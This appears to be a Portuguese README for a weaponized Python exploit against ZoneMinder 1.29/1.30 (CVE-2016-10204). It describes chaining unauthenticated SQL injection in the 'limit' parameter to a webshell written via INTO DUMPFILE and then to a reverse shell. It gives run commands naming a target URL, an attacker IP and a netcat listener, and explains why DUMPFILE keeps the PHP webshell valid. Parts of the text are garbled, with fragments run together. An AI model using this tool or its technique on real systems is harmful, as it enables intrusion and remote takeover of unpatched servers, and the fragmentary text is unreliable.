
Injeção SQL não autenticada para exploit de RCE no ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC em Python de SQLi em comando único para webshell até reverse shell.
Um exploit em Python pronto para execução para ZoneMinder 1.29/1.30 que encadeia a injeção SQL não autenticada (CVE-2016-10204, EDB-41239) até uma reverse shell interativa.
Este é um PoC weaponizado/automatizado para uma CVE conhecida e corrigida, não um novo exploit.
O PoC do EDB para este bug para no payload de SQLi ou em "aponte o sqlmap para ele." Este exploit empacota a cadeia completa SQLi para webshell para shell em um único script legível.
SLEEP) no parâmetro POST limit
de index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE,
tentando vários caminhos comuns de ZoneMinder/Apache.bash para o seu
listener netcat.DUMPFILE, não OUTFILE. OUTFILE escapa novas linhas e corrompe
PHP multi-linha; DUMPFILE escreve bytes brutos, então a webshell permanece válida.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, veja LICENSE.